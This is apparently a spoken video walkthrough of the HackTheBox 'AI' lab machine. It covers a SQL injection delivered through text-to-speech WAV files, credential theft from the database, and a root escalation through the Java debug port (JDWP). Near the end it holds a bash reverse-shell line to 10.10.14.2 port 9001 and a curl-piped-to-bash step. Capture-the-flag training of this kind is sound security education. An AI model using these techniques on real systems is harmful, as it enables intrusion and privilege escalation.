What's going on YouTube? This is Ipsec. I'm doing AI from HackTheBox, which had a really interesting attack path. The server itself is a speech to text thing, so you can upload it WAV files with words spoken, and then it will tell you what words were in that WAV file. So if you verbally spoke a SQL injection, it didn't sanitize it when adding it to the database, and you can actually perform a SQL injection that way. It was a little bit frustrating trying to get the speech to text thing to identify exactly what words you wanted to say, but I mean, anyone who's ever interacted with a automated system for speech to text just always has horror stories. And the attack path itself is really cool because I've always heard stories about people using SQL injections in unique ways. For instance, like at colleges where you have a barcode you can scan to get your account, I've seen people put SQL injections in that barcode that when scanned, always said they had money in their account so they could just get free lunches. So that was getting used on the box. The privesc is going through a Java debug thing, which is really cool. I can't really explain it. It's better just to show it. So let's just jump in and do the box. As always, we begin with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it AI, and then the IP address, which is 10.10.10.163. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, and its banner tells us it's running Apache HTTPD version 2429. We also get the nmap script http-title running, and it tells us the title of the page is hello-AI. There's not really much information we can get from nmap, so let's just go take a look at the actual page. Navigating to 10.10.10.163, we get a page. If we go to this top left, we get a menu. But before I go looking at that, I just want to look at the source real quick to see if I see any like WP-, which would indicate it's a WordPress page, or something along those lines that would tell me what this is. And I don't recognize any of the source, so let's just go take a look at these pages. So I'm going to open each one in a tab, and notice each extension is PHP. So because I always like doing some type of recon in the background, now's a good time to start off a GoBuster. So I'm going to do GoBuster-u, HTTP 10.10.10.163, and I forgot to tell it dir mode. I always forget that flag. But after URL, word list, user, share, word list, dirbuster, directory list, 23 medium.txt. I'm going to specify -x for extension and do PHP because we know it's a PHP server. And then -o for out file. I'm just going to call this GoBuster root php.out. Just something to tell me what I ran. So with that being run, let's go look at the actual pages. So this about.php says they're doing something with, man, that is annoying, that JavaScript, voice recognition from audio files. And then we have drop your query using WAV files. So we select a file to upload, and then we can process it. So right away, I'm just going to create test.php and create a PHP script to say, please subscribe. So run that. And I always try to do super basic PHP scripts first instead of going straight for like the reverse shell. Go for something like an echo, because if they have like PHP safe mode enabled, they may block your reverse shell, but they won't block echo. So just a little tip. When we upload it, we see our understanding of your input is blah. Query result is blah. So we don't really get anything. The first thing I'm going to do is try to go to like /uploads to see if we can get to the file. And we see it is a forbidden. We don't have permission to access this. I'm going to do test.php, and it's not found. So right off the bat, I'm going to create a note. So we'll call AI, and then to do, how are files stored that are uploaded? This is going to be a question I ask myself once I get on the box, or if I need to dig further in, because maybe it's like just putting a date timestamp here, and the file name is not random, so maybe you can guess it. So once we get on the server, we should definitely take a look at that and just see if we missed anything. So, and looking at contact.php, we get a note saying drop a message to Mr. Reboot at ai.htb, which is a host name. So I'm going to add this into my host file and see if anything new comes up. So 10.10.10.163, ai.htb, and we can go http ai.htb, and we get the same exact page with nothing else. So nothing there. Let's go take a look at our GoBuster, see if we have anything new. Well, we didn't know about images, but that's just a 301 redirect, so probably nothing special. We can try ai.htb/images, and we just get forbidden. Okay. Index, about, contact, uploads. We knew about all these. db.php. We don't know about that one. So we go to db.php. It's just a blank page. So that probably has all the like database login credentials in a PHP tag, so you can't pull them. If we had some type of like LFI vulnerability, we may be able to get that file. We have intelligence.php, which is one we did not know. So let's go take a look at intelligence. And it says your user input as below. Commento, AI output is comment, idea, design schema, thought, join, merge, union. One is one. Comma gets translated to that. Say hi Python gets translated to this. Comment database. So right now we're seeing a bunch of, I guess, aliases is the best way to explain this. And if we go back to the upload, it is telling us a WAV file to upload. So my guess right now is we have to upload some type of text-to-speech thing. So what I'm going to do is just go to Google, and then we can search for maybe Linux version of say command. Say on Mac computers has a like text-to-speech thing. So you just say something, and then it goes and does it. So we can do apt-get install GNU GUI runtime. So we can try this, and this will give us the say command. So paste that to install it. Not found. I wonder if I have to update my apt repository. So it didn't fully download that. Apt update. Let's update everything, and then we'll run that again. Because it can't find this lib-1 package. So let's install this again. Yes. And this time it looks like it worked. So if you ever get apt errors, always just run apt update. And now it is installing it. And this triggers thing always takes a while, but now it should be installed. So if I have which say, I do have it. So if I do say-h, say hello, I'm not hearing any sound. So I'm just going to quickly take a look. My volume is on. Let's go to my VM settings to make sure my audio is connected. Options, no, hardware. Sound card. There we go. So let's make sure that's connected. And we can now do say hello.
Hello.
And we get it responding. However, I don't know how to get say to actually go to a file. If we do like say hello to test.
Hello.
Oh, I typed that. That was funny.
Hello.
But we don't really get anything. If I look at the file test, it is empty. So let's try going to the next program down, which is Festival. So we can do apt-get install Festival, and this gives us something called text-to-wave, I believe. And one of the cool things with apt that you may not have, which we'll do after this, is an apt-file search. So if there's ever a file you want executed but you don't know the package name, you can install the apt-file. So apt install apt-file, and we'll run this right after that finishes, and then build the apt-file repository, and that will give you a way to search for files. So once this installs, we'll run this one, and then go back into the text-to-speech things. And I could have probably tried to get a recording application, just record myself saying the things, but based upon my interaction with other voice-to-text machines, I don't do a good job, and it's probably not repeatable for everyone that watches these videos where English isn't their main language, and also, I just don't know how to get my microphone piped into Kali, and I didn't feel like researching that. So That's why we're doing it this way, by using a file to translate text into a sound, into uploading it. So now that we have apt-file, if we do apt-file update, just like apt update, this will build a file cache of everything. And then once this is there, we can just do apt-file search, and it will search all our apt repositories for packages that contain the file we want. So it's a really, really handy thing. And this may take longer to download than I thought. There we go. We got apt-file there. So if we do apt-file search text to WAV, we can see that is provided by the package Festival. So that is what we're going to be using. And that's what we just installed. So we can do echo hello and pipe that to text to WAV and then -o, I think, for output. Let's just text to WAV -h. -o is to save it. So echo hello text to WAV -o test.wav. And if we don't do -o, text to, I don't know. There should have been a way to output that or play through my speaker. I bet if we open this file, it'll work. So open folder, let's go to root, where's HTB, boxes, AI, test.wav.
Hello.
So we have that processing. So if we go back to this AI program and the /upload oh no, it's /ai.php to upload a WAV file. And this time we upload test.wav, process it. We can see our understanding of your input is hello, and it didn't get anything. So let's try a SQL injection. Open single quote. Text to WAV -o test.wav. Put this, play this, and we get a SQL injection. So we have a really, really weird SQL injection right now. And the first thing I want to do is try a union injection, because if we can get a union injection working, then we can probably extract other data. And yeah, so we're going to do open single quote, union select, and I'm going to do version, open parentheses, close parentheses, and then hyphen, space, hyphen. And we'll see if this works. So we can go uploads, upload this, and we'll see what this guy thinks we said. And we get single quote, you can select. So I guess it translated union to you can. Select version, and then it doesn't look like we have a space. Oh no, we do have a space there, I think. Or we have a space after each hyphen. So I wonder if we do like hyphen, hyphen, like that, and upload it, and see what he says. I think the commas make him like take a small break. And still an error message. So if we went back to the intelligence.php page, there were a few things. So if we look at this, join is translated to union. So we can try just doing join instead of union here. And we could also probably hunt around for other text-to-speech things, because eventually we'll find one this AI was trained with and get it working that way. But it looks like the developers have the same problems we do, so they did things like this. So now we have single quote, union, select, version, and we still have an error message because it's putting a space after each of the comments. But again, looking at this, if we say comment database instead of this hyphen hyphen space hyphen thing, I think it'll work. So as long as it understands us saying comment database. So close parentheses, comment database. And if we go back, test.wave, process it, and we get a result, 5727 of Ubuntu. So we successfully did union injection, and I guess the query result is only returning one row because we didn't have to do multiple columns. And thankfully, we didn't have to because it would be such a pain doing all of this enumeration. And like enumeration, like digging through doing open parentheses, close, comma 1, comma 2, comma 3, things like that would be just a pain. And I don't know why I erased that whole line. We just want to erase, let's see. Let us put this in cherry tree. And I'm just going to put, come on, new child node. There we go. Working. So this is this union select version. So that's what this is. So what we want to do is get rid of version open and close and probably do like select username and try this. Or we can do open parentheses, select username, close parentheses. And yeah, we'll try this. That will be union select username. So let's try this query. Go back. Erase this and then paste the new one. Test.wave, process. And we have an error message. It says selecting username. So let's do open parentheses, select comma username. Does that change it? Oh, we have two selects. I should get rid of that. Let's go. Standing is, that did not work. Where did it get that 2 from? I guess I thought join was 2. We won't put the comma. And this is the fun of this box, is trying to figure out how this works. So let's go back to single quote join, and we won't do parentheses. Try it this way. Process, union, select username, unknown column, username, and field list. So we can try guessing the table. So select username from users. So let's guess that. And you could potentially just do it from information underscore schema, but you saw how long it took me to get a query right. Enumerating that database would just be a hassle. So username is Alexa. So let's do notes, Alexa, and let's get the password. So select password from users, process it, and out of curiosity, what does this actually sound like?
Open single quote, join select, password from user's common database.
That is not the best text-to-speech thing, but we get a potential password. So put that there, and what we can do is go back to GoBuster, see if we found any login pages. We have a few errors, but no login pages. It stopped at ai.php. There is SSH, so we can do SSH Alexa at 10.10.10 163. And we go back here to copy this password, paste it. And this user does have a shell on the box. So this is user.txt. We do wc-c, we can get it. Do lsla to see if there's anything else. There's a .ssh directory, and that's just known host. So the one thing I want to do is check var www HTML, and let's go into uploads. What is that Python script? That caught my eye. Oh, this is the voice translation. What library are they using? Speech recognition as SR. Okay, I don't know what library that is. I was wondering if it's like Google provided something or whatnot. If we look in uploads, it is empty. So for I in sec0 would do like 10,000. Do lsla. Done. This is just a super, super lazy way to do this piece. So I'm going to do Windows key L to move that to the left, Windows key right to move that to the right, and practice my shmoocon F5ing by trying to do this as quick as possible. So we'll hit enter and click. And it does upload that. And it, I guess, just does a random file name. So if we actually looked in the code, which we probably should have done first, but that was a fun way to do it. ai.php. Now let's see, query result, about upload temp name. So it just takes a temp name from PHP, and that is that. So if we went back to uploads and did that same exact command and try to upload our PHP file 100 times, it'll probably be a random string of digits and then dot, maybe wave even. Yeah. So no way to get code execution that way because it's in the .wav file in. I don't think it will execute that. So not to mention that is a killer race condition. So next thing to do, I guess, is to run linPEAS for a privilege escalation check. So make dir www, cd www, and then copy opt. That's payload all the things. Privilege escalation awesome suite, linPEAS, linPEAS.ssh to this directory, python3 http.server 80, and we can curl 10.10.14.2, which I think is my IP address. If config ton 0, it is, slash linPEAS.sh, pipe it to bash. And we'll let this one run. It'll take a little bit to run and go over the results to see if this finds anything. So now that's done, I can use tmux to go to the beginning of me running it by just searching up for curl 10. And then here we'll just quickly go and take a look at things that are in colors. Because linPEAS has a really cool legend, or a land. I guess there's a typo in that version. That's funny. But yeah. So path, system stats, environments, nothing too interesting there. Nothing interesting, some software, compilers. Here we go. So things that root is running is always interesting. Systemd, not too interesting. VM tools. We have LXCFS, so I should make sure my user is not a member of the LXC group because that's always an easy privesc. If you want to see that one, that's in Calamity. I don't believe I'm in that group, but we'll find out soon enough. Going down, we have some stuff by Alexa. That's probably us. Another thing by root, and it's highlighted in red and yellow, which means this is most likely a privesc vector, and that is jdwp. And we see agent lib transport socket localhost 8000. So jdwp is running on 8000. So jdwp 8000. And it's localhost, so that's why our nmap didn't see it. We also got Tomcat running as well. I don't think I see port 8080. So we also have Tomcat. So we should definitely take a look at those two things. If we can get credentials to like the Tomcat manager, we can just upload a WAV file and get it to execute because it's running as root. If it executes what we upload, then we'll get a root shell. Going down here, just looking again. So things in red we should take a look at. We got MySQL and then these ports. Probably take a look at the MySQL database as well, since we didn't do a good job enumerating that because it was text to speech. And permit root login, so root can log in. Bunch of binaries. Nothing too interesting. So I'm probably just going to go start taking a look at the MySQL database, and then we'll look at the Java stuff. So var html, we want to look at db.php because this will have credentials. So localhost db user is the user, Tor is the password, Alexa is the database. So you can do mysql-u db user dash, I think just p, and then we can enter the password Tor and then use Alexa. We probably could have done -D and enter the database directly, and sometimes you'll have to do that based upon how MySQL is configured. But we can do show tables, and we see Alexa and users. If we describe Alexa, there's two things. So we can just do select star from Alexa, and we just see, I guess, some stuff. Select star from users, and we have a bunch of usernames and passwords, AWS credentials, and a root password. So let's just try logging in with this. Exit. I just did Control D. Control D is normally a safe bet to kill things. So, okay. We can do su dash, put this in, and authentication failure. So I'm just going to copy this, and we will put that there. That didn't paste well, but oh well. And then I'm going to do ss-lnpt. This is like the netstat command, just the new way to do it, to see the open ports. So I want to forward 8000, 8005. What is 8005? I don't know what that one is. 8009 and 8080. So 8005, I don't know that one. 8009 is like JDWP or something. Or is JDWP what I'm just saying? This is ADP. Or AJP. AJP is what 8009 is. It is a Tomcat redirector, so you can use this as a proxy service. Since we're already on the box, we don't need to proxy anything, so we can ignore that. 8080 is Tomcat itself, and yeah, so let's just forward 3 ports. So we'll exit this. I guess I could have done it through the SSH command line. We'll do 2 ports this way, and then 1 port through the SSH thing. So I'm going to do -L. I'm going to say 8009, localhost. Well, we'll do IPs. 127.0.0.1, 8009, and 8080. 127.0.0.1, 8080. And before this, we also have to do -L. This specifies local forward. And then we'll log in. So if I do this password, and before we do this, we can do ss-lnpt and see I'm not listing on any ports. Log in, ss-lnpt, and we got 2 more ports open, 8080 and 8009. So if I go to 127.0.0.1, port 8080, we get this Apache page. If I do manager app, we can try logging in with defaults, Tomcat, and it doesn't let us in. We could try like admin, doesn't let us in. So what we could do is find /to dev null to hide error messages, grep Tomcat to see if we can find where Tomcat itself is. And it's in opt-apache. So we can go here and then go into this conf directory, and we can't. So we don't know what the Tomcat password is. So let's go do the Java debugging port, which was jdwp, I think. jdwp. linPEAS. What is it? Come on. Where's processes? So much information. Okay, linPEAS. Yeah, jdwp is debug. So before I do new line, what I'm typing is I think that. So new line, do that. And then I think I can type help here, and it gives us the instructions. So again, new line squiggly C -L 8000 localhost 8000. And again, looking at here, I'm not listening on port 8000 right now. Bind address. Wait, what? Oh, I guess I took too long. -L 8000 localhost 8000. There we go. Forwarding port. And now I'm listening on port 8000. So in order to connect to this port, we just do jdb --attach, and then the port name, which is 8000. Or maybe it's just one dash and attach. There we go. And once we get a shell, we can run jdb commands. And this is something you probably have to do some researching on your own. But there's a bunch of things you can do, like class path. I can look at classes, and here's all the classes that are loaded. The one we're mainly looking for is a runtime, and it's this one, java.lang.Runtime, because this is a quick way to execute code. And this is just a Java debugger. Think of like GDB for binaries, but for Java. So it lets us debug the Java JVM. So this class path already being loaded means we can execute it. So if we do methods java.lang.Runtime, we can see all the things this provides. And I think if you use like the open source Java, that's default on most Linuxes, the exec may be slightly different. So if you're in the JDB and do this, look at this. So we want to execute java.lang.Runtime and then the exec method. So that's what we want to execute. But before we can execute this, we have to be in a thread. And it looks like a JDB detached. So there is a common thread in this that we can just always attach to, which we'll use probably when we do jdwp-shellifier. But if you wanted to find your own, we can do like go trace methods or trace go methods. And this is going to tell us whenever we enter and exit something. So we can do untrace to stop the trace. That is untrace. Untrace. I thought it was. Maybe not. Untrace go methods. Or maybe it's queued up so many. So if you're ever doing this type of exploit and attaching a debugger, use the program we're going to show after this. I just kind of want to show you what's happening behind the scenes, and then we'll do the automated program, which is much safer. Because if you do it this way, you may just cause a bunch of random things to hang, and that is never good. So right now, I'm just looking for a method to set a breakpoint on. So we can see method entered here. I wonder if I did go trace and if I do threads, and we trace a specific thread instead of everything, if that'll be more manageable. Died on us. I think there's a cron that restarts this constantly. But here's something we can probably set a trace on. So if we type threads, does it bring back anything? I would expect it to show all the threads, and there we go. So you can see all the threads that are currently running. So we could set breakpoints on each of these individual threads if we wanted to. Stop in. Let's just say method entered. Where's a good one to do? Guess we can try this. So method and this. I'm guessing this is if we hit the HTTP server. Unable to set breakpoint. Stop in. Pick another one. Java's not my best. So I'm just picking random things, and eventually we'll get something that we can actually set a breakpoint in. There we go. And breakpoint has hit. So now we can do print new java.lang.Runtime.exec bin touch /temp /please subscribe.txt. And if we look at temp, we don't have that file there. It died before we could do it. So let's copy this and redo this. I'm guessing because when you interact with JDB, you can crash Tomcat so often, that's why there's a cron that constantly does this thing. So you just have to be quick. Please, would I type that? Here it is. Copy, paste, ls on temp. Maybe this thread doesn't have that. Print new java.lang.Runtime exec /temp, please subscribe. That looks right. Continue. Let's exit, and let's do the thread I normally do, which is stop in java.lang string index of int. There we go. And we should probably wait 5 to 10 seconds to see if this stops. If not, then Tomcat's probably in a weird state. So there we go. And let's just go back here, copy the command we ran last time, put it in. ls /temp. Still didn't execute. Let's see. Died on us again. Let's try this one last time. I guess it's really picky what thread you're in. I should have done a bit more research in this attack. Stop on java.lang, or stop in java.lang string index of. I need int. Okay. Print new java.lang runtime exec bin touch temp please subscribe.txt. Continue. SLA temp doesn't exist. So what I'm going to do, we'll exit one last time, do a trace. I'm going to look for a different method as this dies. So trace go methods. I'm just going to let this run until it dies normally. Except we didn't get anything. Come on, demo gods. Be with me. Trace go methods. Tomcat must be in a weird state. And there we go. Tomcat's died. So we can now attach back to it. And trace go methods. And now it's going to print a bunch of things. So I'm going to wait for this to die, and then we're going to go over exactly what the trace happened with, or what the trace gave us. And we may get another thread that is better to inject into. I'm thinking the reason why this isn't working is the thread doesn't have the Java runtime loaded. That'd be my guess. So now that it's exited, we can just search back for runtime, and actually we're getting it going all the way back to us. So maybe that doesn't work. JDB attach. I know the definition of insanity is trying the same thing over and over and expecting different results, but that's what we're going to be trying to do because Java is an insane language. So we're going to do stop in java.lang string index of int. Print new java.lang.Runtime. Yes. Exec bin touch temp please subscribe.txt. Let's see. Getting error message at that time. LSLA temp. Hey, we got it. So I'm not sure exactly what was going on, but you can see we wrote it and root owns that file. So that is that way of doing it. And you can imagine you can probably just put like an SSH key, or you can do a reverse shell. You can run any command you want because all we did was untouch. But if you want to do it the safer way, I'd recommend looking into the program jdwp-shellifier. And we can just cd opt, git clone, paste this in. And if we Python to execute it, those are the flags it wants. So -t 127001 -- break on java.lang string index of, and the command we want to run, let's just create cd temp v please work.sh, and we'll do bin bash -c -i dev tcp 10.10.14.2 9001 0 and 1, like that, I think. nclvnp 9001 chmod plus x please work. Okay, we get a shell back. So as long as this executes that command or that file, it'll work. Please work.sh. Okay. Run this. Found runtime. Created the break event. Now it's waiting for it. And there we go. It executed the file, and we have a root shell on AI, wc-c, root.txt, 33, and a line break. So that is the video. Hope you guys enjoyed it. Take care, and I will see you all next week.